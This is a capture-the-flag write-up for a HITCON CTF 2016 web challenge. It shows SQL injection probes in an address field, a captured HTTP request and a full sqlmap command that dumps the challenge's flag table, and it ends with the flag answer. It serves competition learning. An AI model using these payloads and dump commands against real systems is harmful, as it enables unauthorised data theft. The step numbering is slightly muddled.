HITCON CTF 2016: Are you rich? (Web) Write-up

Descriptions:

Are you rich? Buy the flag!
http://52.197.140.254/are_you_rich/
ps. You should NOT pay anything for this challenge
Some error messages which is non-related to challenge have been removed

Solution:

1. Access to website have 2 functions, Get our bitcoin address and Verify payment.

2. Try to get our bitcoin address, It will generate some Bitcoin Address and go to verify it.

3. Not have enough money, I guess after get our bitcoin it may insert this bitcoin into database and have verify payment to check. I try to SQL Injection in Address field.

4. ' or 1=1# --- Found more than 1 records?

5. ' or 1=2# --- does not have enough confirmed money?

4. Confirm the parameter address have vulnerable to SQL Injection, I use Burp Suite to capture HTTP request and copy it to text file.

POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1
Host: 52.197.140.254
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Origin: http://52.197.140.254
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c
Accept-Encoding: gzip, deflate
Accept-Language: th,en;q=0.8

address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=

5. Using SQLmap -r option to Load HTTP request from a text file, SQLmap verify this vulnerable is Time-Based Blind SQL Injection, and final SQLmap option that use for get a flag.

python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump

6. Wait a several minute to retrieve a flag.

In Burp Suite (Union Based)

Flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}